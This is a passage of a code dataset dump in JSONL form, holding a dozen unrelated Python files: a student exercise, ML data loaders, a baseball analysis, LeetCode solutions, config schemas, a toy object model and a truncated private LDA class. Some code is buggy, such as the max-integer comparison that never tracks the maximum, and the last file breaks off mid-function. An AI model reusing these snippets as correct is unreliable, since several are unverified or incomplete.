self.info('Done')\n","sub_path":"common/management/commands/add_domains.py","file_name":"add_domains.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285337960","text":"#Design an algorithm that finds the maximum positive integer input by a user. The user repeatedly inputs numbers until a negative value is entered.\n\nmax_int = 0\n\nwhile True:\n\n num_int = int(input(\"Input a number: \")) # Do not change this line\n \n\n if num_int >= 0:\n if max_int >= num_int:\n max_int = num_int\n else:\n break\n# Fill in the missing code\nprint(\"The maximum is\", max_int) # Do not change this line\n\n# fá upplýsingar af notandanum\n# hækka max_in ef num_int sé hærra\n# tékka ef num_int sé negatív tala, ef svo prenta og enda\n\n\n","sub_path":"max_int.py","file_name":"max_int.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433220375","text":"import tensorflow as tf\nimport os\nimport numpy as np\nfrom hyperimage import Hyperimage\n\n\nclass NirGenerator(tf.keras.utils.Sequence):\n\n def __init__(self, batch_size, train_percent, validate_percent, predict_percent, gen_type):\n self.batch_size = batch_size\n self.train_percent, self.validate_percent, self.predict_percent = train_percent, validate_percent, predict_percent\n if (gen_type != \"train\") and (gen_type != \"validate\") and (gen_type != \"predict\"):\n raise Exception('gen_type must be \"train\", \"validate\" or \"predict\"')\n self.gen_type = gen_type\n self.file_list = os.listdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"Dataset\", \"HyKo2\", \"nir\"))\n self.file_list.sort()\n\n train_size = int(np.ceil(train_percent * len(self.file_list)))\n validate_size = int(np.floor(validate_percent * len(self.file_list)))\n\n if self.gen_type == \"train\":\n self.file_list = self.file_list[:train_size]\n elif self.gen_type == \"validate\":\n self.file_list = self.file_list[train_size:train_size + validate_size]\n else:\n self.file_list = self.file_list[train_size + validate_size:]\n\n def __len__(self):\n return np.ceil(len(self.file_list) / float(self.batch_size)).astype(np.int)\n\n def __getitem__(self, batch_idx):\n hyper_images = []\n batch_file_list = self.file_list[batch_idx * self.batch_size: (batch_idx + 1) * self.batch_size]\n for filename in batch_file_list:\n img_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"Dataset\", \"HyKo2\", \"nir\", filename)\n hyper_images.append(Hyperimage(img_path))\n\n x_train = np.asarray([img.get_hypercube() for img in hyper_images])\n x_train = x_train[..., np.newaxis]\n\n y_train = []\n for img in hyper_images:\n labels = np.repeat(img.get_label()[:, :, np.newaxis], 25, axis=2)\n y_train.append(labels)\n\n y_train = np.asarray(y_train)\n\n return x_train, y_train\n\n def get_file_list(self):\n return self.file_list\n","sub_path":"Python/nir_generator_ann_full.py","file_name":"nir_generator_ann_full.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"251857813","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport BaseballUtils\n\nmodel = pickle.load(open('C:\\\\Users\\\\Andrew Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\swing_model.sav', 'rb'))\ndata = pd.read_csv('C:\\\\Users\\\\Andrew Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\predictors.csv')\n\n\npitchers = pd.read_csv('C:\\\\Users\\\\Andrew Moss\\\\Documents\\\\Pitch_data_rangers_technical2.csv')\npitchers = pitchers.drop_duplicates()\npitchers = pitchers[pitchers['balls'] < 4]\npitchers = pitchers[pitchers['strikes'] < 3]\npitcherTable = BaseballUtils.getNamesFromIDs(pitchers)\n\npitchers = pd.merge(pitchers, pitcherTable, how='left', left_on='pitcher', right_on='pitcher')\ndata['pitcher'] = pitchers.loc[:, 'player_name_y'].values\ndata['zone'] = pitchers.loc[:, 'zone'].values\ndata['out_of_zone'] = np.where(data['zone'] > 9, 1, 0)\ndata = data[data['out_of_zone'] == 0]\ndata['Swing_prob'] = model.predict_proba(data.drop(['Unnamed: 0', 'pitcher', 'is_swing','zone','out_of_zone'],\n axis=1))[:, 1]\ndata['SwUE'] = data['Swing_prob'] - data['is_swing']\ndata = data[data['pitcher'].notna()]\nby_pitcher = data.groupby('pitcher').mean()\nby_pitcher = by_pitcher.sort_values(by='SwUE', ascending=False)\n\nby_pitcher.loc[:, 'SwUE'].\\\n to_csv('C:\\\\Users\\\\Andrew Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\SwUE_on_strikes_by_pitcher.csv')\n","sub_path":"Swinging_On_Strikes.py","file_name":"Swinging_On_Strikes.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"162969229","text":"\"\"\"\n1. Recusive solution\n2. DP solution\nIdeas are same, when player 1 picks, picks the largest, when player 2 picks, picks the largest too, so nums[0] - helper(nums[1:]).\nSince the value for player 2 is not good for player 1.\ndp[i][j] means the best value from index i to index j of nums, for player 1\nThe dp solution updates the values by slide length.\n\"\"\"\nclass Solution(object):\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n memories = {}\n def helper(nums):\n if len(nums) <= 1:\n return sum(nums)\n numsTuple = tuple(nums)\n if numsTuple in memories:\n return memories[numsTuple]\n temp = max(nums[0] - helper(nums[1:]), nums[-1] - helper(nums[:-1]))\n memories[numsTuple] = temp\n return temp\n return helper(nums) >= 0\n\n\nclass Solution(object):\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n dp = [[0] * len(nums) for i in range(len(nums))]\n for i in range(len(nums)):\n dp[i][i] = nums[i]\n for slideLength in range(1, len(nums)):\n for i in range(0, len(nums) - slideLength):\n j = i + slideLength\n dp[i][j] = max(nums[i] - dp[i+1][j], nums[j] - dp[i][j-1])\n return dp[0][-1] >= 0\n","sub_path":"solution/python/486.py","file_name":"486.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"490396694","text":"#\n# Copyright (c) 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom marshmallow import Schema, fields, validates_schema, ValidationError, post_load, validate\n\n\nclass ModelOvmsMappingSchema(Schema):\n model_name = fields.String(required=True)\n model_version = fields.Integer(required=True)\n\n\nclass ModelInputConfiguration:\n def __init__(self, input_name: str, channels: int = None,\n target_height: int = None, target_width: int = None,\n color_format: str = 'BGR', scale: float = None,\n standardization: bool = False, input_format: str = 'NCHW'):\n self.input_name = input_name\n self.channels = channels\n self.target_height = target_height\n self.target_width = target_width\n self.reverse_input_channels = True if color_format == 'BGR' else False\n self.scale = scale\n self.standardization = standardization\n self.channels_first = False if input_format == 'NHWC' else True\n\n def as_preprocessing_options(self) -> dict:\n return {\n 'channels': self.channels,\n 'target_size': (self.target_height, self.target_width)\n if self.target_height and self.target_width else None,\n 'channels_first': self.channels_first,\n 'scale': self.scale,\n 'standardization': self.standardization,\n 'reverse_input_channels': self.reverse_input_channels\n }\n\n\nclass ModelInputConfigurationSchema(Schema):\n input_name = fields.String(required=True)\n channels = fields.Integer(required=False)\n target_height = fields.Integer(required=False)\n target_width = fields.Integer(required=False)\n color_format = fields.String(\n required=False, validate=validate.OneOf({'BGR', 'RGB'}))\n scale = fields.Float(required=False,\n validate=validate.Range(min=0, min_inclusive=False))\n standardization = fields.Bool(required=False)\n input_format = fields.String(\n required=False, validate=validate.OneOf({'NCHW', 'NHWC'}))\n\n @post_load\n def make_model_input_configuration(self, data, **kwargs):\n return ModelInputConfiguration(**data)\n\n @validates_schema\n def validate_type(self, data, **kwargs):\n if data.get('target_width') and not data.get('target_height'):\n raise ValidationError('target_height must defined if target_width was set. '\n 'Invalid config: {}'.format(data))\n if data.get('target_height') and not data.get('target_width'):\n raise ValidationError('target_width must defined if target_height was set. '\n 'Invalid config: {}'.format(data))\n\n\nclass ModelOutputConfiguration:\n def __init__(self, output_name: str, value_index_mapping: dict = None,\n classes: dict = None, confidence_threshold: float = None,\n top_k_results: int = None, is_softmax=None, value_multiplier=None):\n self.output_name = output_name\n self.value_index_mapping = value_index_mapping\n self.classes = classes\n self.confidence_threshold = confidence_threshold\n self.top_k_results = top_k_results\n self.is_softmax = is_softmax\n self.value_multiplier = value_multiplier\n\n def __str__(self):\n return 'ModelOutputConfiguration({})'.format(vars(self))\n\n def __repr__(self):\n return 'ModelOutputConfiguration({})'.format(vars(self))\n\n\nclass ModelOutputConfigurationSchema(Schema):\n output_name = fields.String(required=True)\n is_softmax = fields.Boolean(required=False)\n value_multiplier = fields.Float(required=False)\n value_index_mapping = fields.Dict(\n keys=fields.String(), values=fields.Integer(), required=False)\n classes = fields.Dict(keys=fields.String(),\n values=fields.Number(), required=False)\n confidence_threshold = fields.Float(\n required=False, validate=validate.Range(min=0, max=1))\n top_k_results = fields.Integer(\n required=False, validate=validate.Range(min=0, min_inclusive=False))\n\n @post_load\n def make_model_output_configuration(self, data, **kwargs):\n return ModelOutputConfiguration(**data)\n\n\nclass ModelConfigurationSchema(Schema):\n endpoint = fields.String(required=True)\n model_type = fields.String(required=True)\n inputs = fields.List(fields.Nested(ModelInputConfigurationSchema, required=True), required=True)\n outputs = fields.List(fields.Nested(ModelOutputConfigurationSchema, required=True), required=True)\n ovms_mapping = fields.Nested(ModelOvmsMappingSchema, required=True)\n","sub_path":"extras/ams_wrapper/src/api/models/model_config.py","file_name":"model_config.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381705579","text":"import random\n\nhanguls = list(\"민경수진욱상은채섭철건예\")\n\nwith open(\"./studyPython/data/result.txt\", \"w\") as f:\n f.write(\"{}, {}, {}\\n\".format(\"이름\", \"몸무게\", \"키\"))\n \n for i in range(1000):\n name = random.choice(hanguls) + random.choice(hanguls)\n weight = random.randrange(40, 100)\n height = random.randrange(150, 200)\n\n f.write(\"{}, {}, {}\\n\".format(name, weight, height))\n\nprint(\"파일생성이 완료되었습니다.\")","sub_path":"StudySeries/pythonNew/studyPython/chap5/chap5_3_4.py","file_name":"chap5_3_4.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125807239","text":"class GTTypeNotDetected(Exception):\n '''Raised when Global Tag object tries to detect onw type and fails'''\n pass\n\nclass GlobalTag(object):\n\n # map between relval process and GT type\n RELVALMAP = dict() #getWfList\n RELVALMAP['mc'] = ['29', '35']\n RELVALMAP['ideal'] = ['29', '35']\n RELVALMAP['startup'] = ['29', '35']\n RELVALMAP['hlt'] = ['4.291']\n RELVALMAP['data'] = ['4.17']\n RELVALMAP['cosmics'] = ['4.22']\n RELVALMAP['hi'] = ['40', '41', '42']\n RELVALMAP['express'] = ['4.17']\n RELVALMAP['prompt'] = ['1000', '4.17']\n\n def __init__(self, name, gt_type):\n '''If gt_type is none - doing autodetection'''\n self._name = str(name)\n self._type = gt_type\n\n if self._type is None:\n self._detect_gt_type()\n\n self._detect_gt_options()\n\n def _detect_gt_type(self):\n # determine the type from the GT name\n if \"_H_\" in self._name:\n self._type = 'hlt'\n elif \"DESIGN\" in self._name:\n self._type = 'ideal'\n elif \"MC\" in self._name:\n self._type = 'mc'\n elif \"STARTHI\" in self._name:\n self._type = 'hi'\n elif \"START\" in self._name:\n self._type = 'startup'\n elif \"GR_R\" in self._name or \"FT\" in self._name:\n self._type = 'data'\n elif \"CRFT\" in self._name or \"CRAFT\" in self._name:\n self._type = 'cosmics'\n elif \"GR_E_\" in self._name:\n self._type = 'express'\n elif \"GR_P_\" in self._name:\n self._type = 'prompt'\n elif \"POST\" in self._name:\n self._type = 'mc'\n\n else:\n raise GTTypeNotDetected(\"Could not detect gt type for \" + self._name)\n\n def _detect_gt_options(self):\n self._is_online = (self._type == 'hlt')\n self._is_monte_carlo = (self._type == 'ideal') or\\\n (self._type == 'startup') or\\\n (self._type == 'mc') or\\\n (self._type == 'hi')\n\n\n @property\n def name(self):\n return self._name\n\n @property\n def isOnline(self):\n return self._is_online\n\n @property\n def isMC(self):\n return self._is_monte_carlo\n\n @property\n def relval(self):\n return self.RELVALMAP[self._type]\n\n @property\n def type(self):\n return self._type","sub_path":"common/globaltag.py","file_name":"globaltag.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"478631476","text":"import glob\nimport json\nfrom spacy.lang.en import English\n\nnlp = English()\nnlp.add_pipe(nlp.create_pipe('sentencizer'))\n\npaths = [\"/data/RACE/train/high\", \"/data/RACE/train/middle\"]\n\nwith open(\"result.txt\", 'a', encoding='utf-8') as wr:\n for path in paths:\n filenames = glob.glob(path + \"/*txt\")\n for filename in filenames:\n with open(filename, 'r', encoding='utf-8') as fpr:\n data_raw = json.load(fpr)\n doc = nlp(data_raw['article'])\n for sent in doc.sents:\n text = sent.text.strip('\\n')\n wr.writelines(text)\n wr.writelines(\"\\n\")\n wr.writelines(\"\\n\")\n","sub_path":"preprocess/convert_passage_to_line.py","file_name":"convert_passage_to_line.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"604056961","text":"# -*- coding: utf-8 -*-\nclass Base(object):\n \"\"\"\n 实现所有的类共用的方法,如:read_attr, write_attr\n 所有的类都继承这个基类,获取公共的接口\n \"\"\"\n\n def __init__(self, cls, fields):\n \"\"\"\n cls 是创建实例的类\n fields 是实例的属性\n \"\"\"\n self.cls = cls\n self._fields = fields\n\n # _read_dict 和 _write_dict\n # 当 Instance 存储方式还未改动时,自认为是不需要的\n # 改动后,发现这两个函数的 Magic\n # 子类可以根据自己的实现读取和添加属性\n # 同时不会影响 read_attr 和 write_dict\n # SICP 中的抽象层\n def _read_dict(self, fieldname):\n return self._fields.get(fieldname, MISSING)\n\n def _write_dict(self, fieldname, value):\n self._fields[fieldname] = value\n\n def read_attr(self, fieldname):\n # 在实例的属性字典中查找\n result = self._read_dict(fieldname)\n if result is not MISSING:\n return result\n\n # 在创建实例的类的属性字典中查找\n result = self.cls._read_from_class(fieldname)\n if _is_bindable(result):\n return _make_boundmethod(result, self)\n if result is not MISSING:\n return result\n\n # 在 __get_attr__ 中查找\n meth = self.cls._read_from_class(\"__getattr__\")\n if meth is not MISSING:\n return meth(self, fieldname)\n\n # 都没有就抛出异常\n raise AttributeError(\n \"class %s don't have %s attribute\" % (self.cls.class_name, fieldname)\n )\n\n def write_attr(self, fieldname, value):\n \"\"\"\n 首先找描述器的实例,调用 __set__\n 然后查找 __setattr__, 如果在类中找到就会调用,\n 否则就会调用 OBJECT 的 __setattr__ 属性\n \"\"\"\n field = self.cls._read_from_class(fieldname)\n if hasattr(field, \"__set__\"):\n field.__set__(self, value)\n meth = self.cls._read_from_class(\"__setattr__\")\n meth(self, fieldname, value)\n\n def isinstance(self, cls):\n \"\"\"\n 判断是否当前的实例是否是给定类的实例\n 在 Class 和 Instance 类的 __init__ 方法中可以看出\n self.cls 是创建实例的类\n 判断一个实例是 某个类的实例\n 则需确定创建这个实例的类是否是指定 cls 的子类\n \"\"\"\n return self.cls.issubclass(cls)\n\n def callmethod(self, method, *args):\n m = self.read_attr(method)\n return m(*args)\n\n\nMISSING = object()\n\n\ndef _is_bindable(method):\n # 1. 可调用的属性方法是有 __get__ 属性的(这个属性是函数类的属性)\n # 2. 如果是实现 __get__ 描述器的实例, 也有这个 __get__ 属性\n return hasattr(method, \"__get__\")\n\n\ndef _make_boundmethod(method, self):\n \"\"\"\n 这种闭包方式需要学习\n 调用时隐式添加参数,函数绑定后可以减少传参\n \"\"\"\n\n # def bound(*args):\n # return method(self, *args)\n #\n # return bound\n\n # 1. method 是创建实例的类的属性方法, 这个结果是啥?\n # 2. method 是创建实例的类的属性,但是这个属性是描述器的实例,结果又是啥?\n # 类的属性方法是通过属性方法的 __get__ 方法实现 self 绑定\n # 返回的是绑定方法\n # 但是一般的函数是描述符,但是并不能绑定东西,目前找不到实例证明\n return method.__get__(self, None)\n\n\ndef _hasattr(obj, attr):\n try:\n obj.read_attr(attr)\n return True\n except AttributeError:\n return False\n\n\nclass Class(Base):\n \"\"\"\n 创建用户自定义的类\n \"\"\"\n\n def __init__(self, class_name, base_class, fields, metaclass):\n # 这个自定义的类是由元类创建,\n # fields 表示这个用户自定义的类的属性\n Base.__init__(self, metaclass, fields)\n self.name = class_name\n if isinstance(base_class, tuple):\n self.base_class = base_class\n else:\n self.base_class = (base_class,)\n self.class_name = class_name\n\n def method_resolution_order(self):\n \"\"\"\n MRO 属性确定类的所有父类\n 支持多继承的方式,类的解析顺序是深度优先\n \"\"\"\n rv = [self]\n for base_class in self.base_class:\n if base_class is not None:\n rv += base_class.method_resolution_order()\n return rv\n\n def issubclass(self, cls):\n return cls in self.method_resolution_order()\n\n def _read_from_class(self, method):\n for cls in self.method_resolution_order():\n if method in cls._fields:\n return cls._fields[method]\n return MISSING\n\n\nclass Map(object):\n \"\"\"\n 存储同一个类的不同实例的属性映射\n \"\"\"\n\n def __init__(self, attrs):\n self.attrs = attrs\n self.next_maps = {}\n\n def get_index(self, fieldname):\n return self.attrs.get(fieldname, MISSING)\n\n def next_map(self, fieldname):\n assert fieldname not in self.attrs\n if fieldname in self.next_maps:\n return self.next_maps[fieldname]\n attrs = self.attrs.copy()\n attrs[fieldname] = len(attrs)\n result = self.next_maps[fieldname] = Map(attrs)\n return result\n\n\nEMPTY_MAP = Map({})\n\n\nclass Instance(Base):\n \"\"\"\n 创建用户自定义类的实例\n \"\"\"\n\n def __init__(self, cls, *args):\n assert isinstance(cls, Class)\n Base.__init__(self, cls, None)\n self.map = EMPTY_MAP\n self.storage = []\n\n init_method = self.read_attr(\"__init__\")\n init_method(self, *args)\n\n def _read_dict(self, fieldname):\n index = self.map.get_index(fieldname)\n if index != MISSING:\n return self.storage[index]\n return MISSING\n\n def _write_dict(self, fieldname, value):\n index = self.map.get_index(fieldname)\n if index != MISSING:\n self.storage[index] = value\n else:\n new_map = self.map.next_map(fieldname)\n self.storage.append(value)\n self.map = new_map\n\n\n# object 类:\n# object 类是所有类的基类,则 object 没有父类\n# type 类:\n# type 指的是所有类的创建类(元类)\n# 则有 type 的父类是 object\n# 特殊的是:object 的创建类是type, type 的元类是 type\ndef OBJECT__setattr__(self, key, value):\n self._write_dict(key, value)\n\n\ndef OBJECT__init__(self, *args):\n pass\n\n\nOBJECT = Class(\n class_name=\"object\", base_class=None, metaclass=None,\n fields={\n \"__setattr__\": OBJECT__setattr__,\n \"__init__\": OBJECT__init__\n }\n)\nTYPE = Class(class_name=\"type\", base_class=OBJECT, fields={}, metaclass=None)\nOBJECT.cls = TYPE\nTYPE.cls = TYPE\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450930710","text":"# find the prime numbers of a certain range\n# and put them in a list\nprimes = [] #empty list\nn=int(input('Enter the number :'))\nfor n in range(2,n):\n ans = True\n for i in range(2,n):\n if n%i==0:\n ans=False\n break\n if ans == True:\n primes.append(n) #add to list if prime\n\nprint('Prime Numbers=',primes)\n","sub_path":"no.inlist.py","file_name":"no.inlist.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"582571011","text":"#!/usr/bin/python3.5\n\n# Includes\nimport os # Using it for clearing the screen\nimport time # Using it for delays\nimport sys # Using it for displaying chars 1 by 1\nexec(open('/root/Desktop/Python/Kurs/inc/floor.py').read()) # Including everything from floor.py file\nexec(open('/root/Desktop/Python/Kurs/inc/logical-operators.py').read())\nexec(open('/root/Desktop/Python/Kurs/inc/boolean.py').read())\nexec(open('/root/Desktop/Python/Kurs/inc/getkey.py').read())\n# Global variables\nscore = 0 # declaring a global variable score used for the True & False test\ncurrent_exercise = 'Main Menu' # declaring a global variable \n# This is the main part of the program\n# Only the menu is coded here!\n# by me ofc! xD\n\n# START OF MAIN MENU\ndef main_menu():\n\tos.system('clear')\n\tmenu_text = 'Python Tutorial\\nот мен за теб :)\\n\\n\\n1. Гладен ли си? [Floor division]\\n2. Тест. [Boolean expressions and modulus]\\n3. На колко години сте? [Logical operators]\\n4. Рисуване. [Turtle]\\n\\nX. Изход.\\n'\n\tfor char in menu_text:\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(.1)\n\n\tuserChoice = input('Моля въведете вашият избор: ') # Waiting for user input\n\n\tif userChoice == '1':\n\t\tos.system('clear')\n\t\tfloor_div()\n\telif userChoice =='2':\n\t\tos.system('clear')\n\t\ttest_ex()\n\telif userChoice == '3':\n\t\tlifeQ()\n\telif userChoice == 'x' or userChoice == 'X' or userChoice == 'Exit' or userChoice == 'exit':\n\t\tos.system('clear') # clearing the screen\n\t\tprint('You are exiting the program...')\n\t\ttime.sleep(3) # delay for 3 seconds\n\t\tprint('Goodbye!')\n\t\ttime.sleep(3) # delay for 3 seconds\n\t\tos.system('clear')\n\t\texit() # exiting the program\n\telse:\n\t\tos.system('clear')\n\t\tprint('Грешна опция! Моля опитайте отново.')\n\t\ttime.sleep(5)\n\t\tos.system('clear')\n\t\tmain_menu()\n\n# END OF MAIN MENU\nmain_menu() # Executing the function\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405283745","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/contrib/gis/geos/prototypes/misc.py\n# Compiled at: 2018-07-11 18:15:30\n\"\"\"\n This module is for the miscellaneous GEOS routines, particularly the\n ones that return the area, distance, and length.\n\"\"\"\nfrom ctypes import c_int, c_double, POINTER\nfrom django.contrib.gis.geos.libgeos import GEOM_PTR, GEOS_PREPARE\nfrom django.contrib.gis.geos.prototypes.errcheck import check_dbl, check_string\nfrom django.contrib.gis.geos.prototypes.geom import geos_char_p\nfrom django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc\nfrom django.utils.six.moves import xrange\n__all__ = [\n 'geos_area', 'geos_distance', 'geos_length']\n\ndef dbl_from_geom(func, num_geom=1):\n \"\"\"\n Argument is a Geometry, return type is double that is passed\n in by reference as the last argument.\n \"\"\"\n argtypes = [ GEOM_PTR for i in xrange(num_geom) ]\n argtypes += [POINTER(c_double)]\n func.argtypes = argtypes\n func.restype = c_int\n func.errcheck = check_dbl\n return func\n\n\ngeos_area = dbl_from_geom(GEOSFunc('GEOSArea'))\ngeos_distance = dbl_from_geom(GEOSFunc('GEOSDistance'), num_geom=2)\ngeos_length = dbl_from_geom(GEOSFunc('GEOSLength'))\nif GEOS_PREPARE:\n geos_isvalidreason = GEOSFunc('GEOSisValidReason')\n geos_isvalidreason.argtypes = [GEOM_PTR]\n geos_isvalidreason.restype = geos_char_p\n geos_isvalidreason.errcheck = check_string\n __all__.append('geos_isvalidreason')","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280030637","text":"from typing import Dict\n\nimport numpy as np\nimport opt_einsum as oe\nimport tensorly\nfrom scipy import sparse\nfrom tensorly.decomposition import parafac\n\nfrom .helpers import noiser, proj_l1_simplex, euclidean_proj_simplex\nfrom .misc import *\n\n\nclass DPSLatentDirichletAllocation:\n\tdef __init__(\n\t\t\tself,\n\t\t\tn_topics: int,\n\t\t\tdoc_topic_prior,\n\t\t\t_alpha0 = None,\n\t\t\tvariances: Dict = {},\n\t\t\tl1_simplex_projection: bool = True,\n\t):\n\t\t\"\"\"\n\t\t:param n_topics: Number of topics.\n\t\t:param doc_topic_prior: Prior of document topic distribution. Also called alpha.\n\t\t:param variances: Noise variances configured to a given set of edges.\n\t\t:param l1_simplex_projection: Boolean condition illustrating projection of beta to simplex.\n\t\t\"\"\"\n\t\tself.n_topics = int(n_topics)\n\t\tself.doc_topic_prior = doc_topic_prior\n\t\tself._alpha0 = _alpha0\n\t\tself.variances = variances\n\t\tself.l1_simplex_projection = l1_simplex_projection\n\n\tdef __repr__(self):\n\t\treturn f'{self.__class__.__name__}(n_topics={self.n_topics}, doc_topic_prior={self.doc_topic_prior})'\n\n\tdef calculate_moment2(self):\n\t\tpass\n\n\tdef fit(self, document_word_counts):\n\t\t\"\"\"\n\t\t:param document_word_counts: Document Word Count Matrix\n\t\t:return:\n\t\t\"\"\"\n\t\tself.document_word_counts = document_word_counts\n\t\tif not hasattr(self, 'whitener') or not hasattr(self, 'unwhitener'):\n\t\t\tprint('Whitener and Unwhitener not cached. Calculating from scratch...')\n\t\t\tself.m2_eigenvalues, self.m2_eigenvectors = self.decompose_moment2()# TODO: Compute actual M2\n\t\t\tself.whitener = self.create_whitener()\n\t\t\tself.unwhitener = self.create_unwhitener()\n\t\tif self.n_words > self.n_words_threshold:\n\t\t\tprint('vocabulary size too large, skip generating raw M3, generate whitened M3 directly')\n\t\t\tself.whitened_moment3 = self.create_whitened_moment3()\n\t\telse:\n\t\t\tprint('vocabulary size small, generating raw M3, then whiten it')\n\t\t\tself.moment3 = self.create_moment3()\n\t\t\tself.whitened_moment3 = self.whiten_moment3()\n\n\t\tself.factors = self.decompose_moment3()\n\t\tself.m3_eigenvalues = np.linalg.norm(self.factors[0], axis=0)\n\t\tself.factors[0] /= self.m3_eigenvalues\n\t\tassert np.allclose(np.linalg.norm(self.factors[0], axis=0), 1)\n\n\t\tself.unique_factor = self.factor_correct_sign()\n\n\t\tself.doc_topic_posterior = (1 / (self.m3_eigenvalues ** 2))[::-1]# problematic\n\t\tself.topic_word_distribution = self.create_topic_word_distribution() # how does this work?\n\t\t#breakpoint()\n\t\t#print('self.factors', self.factors[0])\n\t\t#print('self.unique_factor', self.unique_factor)\n\t\t#print('self.m3_eigenvalues',self.m3_eigenvalues)\n\t\t# print('norm(T-T_hat)', np.linalg.norm(,ord=1))\n\t\t# print('self.topic_word_distribution before projection',self.topic_word_distribution)\n\n\t\tif self.l1_simplex_projection:\n\t\t\tfor i in range(self.n_topics):\n\t\t\t\ttry:\n\t\t\t\t\t#self.topic_word_distribution[:, i] = proj_l1_simplex(self.topic_word_distribution[:, i])\n\t\t\t\t\tself.topic_word_distribution[:, i] = euclidean_proj_simplex(self.topic_word_distribution[:, i])\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\n\t\tself.topic_word_distribution = self.topic_word_distribution[:, ::-1]\n\t\t# print('l1_projection..')\n\t\t# print('self.topic_word_distribution after projection',self.topic_word_distribution)\n\n\t@property\n\tdef moment1(self):\n\t\t\"\"\"\n\t\tFirst moment of document word count matrix.\n\t\t:return:\n\t\t\"\"\"\n\t\tm1 = self.document_word_proportions.sum(axis=0) / self.n_docs\n\t\t## m1 should be a vector, but if a sparse representation was used\n\t\t## to create it, it would have 2 dims instead of 1. We use this to convert\n\t\t## from matrix to vector\n\t\tif len(m1.shape) > 1:\n\t\t\tm1 = m1.A1\n\t\treturn m1\n\n\t@property\n\tdef n_words_threshold(self):\n\t\treturn 200\n\t\n\t@property\n\tdef n_partitions(self):\n\t\treturn 1\n\n\t# @seed(44)\n\tdef decompose_moment2(self):\n\t\t\"\"\"\n\t\tThis method approximates the second moment by using power iteration\n\t\tand computes a truncated SVD on it.\n\t\t:return:\n\t\t\"\"\"\n\t\tif self.n_words > self.n_words_threshold:\n\t\t\tprint('vocabulary size too large, using rand_svd')\n\t\t\treturn rand_svd(self.document_word_counts, self.alpha0, self.k, docs_m1=self.moment1, n_iter=3, n_partitions=self.n_partitions)\n\t\telse:\n\t\t\tprint('vocabulary size small, using compute_raw_M2')\n\t\t\treturn compute_raw_M2(self.document_word_counts, self.alpha0)\n\n\tdef create_whitened_moment3(self):\n\t\tif not hasattr(self, 'whitened_moment3'):\n\t\t\tprint('moment 3 not cached, whitening moment3')\n\t\t\tthe_whitened_m3 = whiten_m3(self.document_word_counts, self.whitener, self._alpha0, docs_m1=self.moment1, n_partitions=self.n_partitions)\n\t\t\tthe_whitened_m3 *= self.alpha0 * (self.alpha0 + 1) * (self.alpha0 + 2) / 2\n\t\t\tthe_whitened_m3 = the_whitened_m3.reshape((self.k, self.k, self.k))\n\t\t\treturn the_whitened_m3\n\t\telse:\n\t\t\tprint('moment3 cached, returning cached moment3.')\n\t\t\treturn self.whitened_moment3\n\n\t# @seed(43)\n\t@noiser(edge='e3')\n\tdef create_moment3(self):\n\t\t\"\"\"\n\t\tCreates the third moment.\n\t\t:return:\n\t\t\"\"\"\n\n\t\tdef term1():\n\n\t\t\t# clip zero counts to 1 to avoid divide by zero errors.\n\t\t\tl_ns_min_1 = self.l_ns - 1\n\t\t\tl_ns_min_1[l_ns_min_1 == 0] = 1\n\t\t\tl_ns_min_2 = self.l_ns - 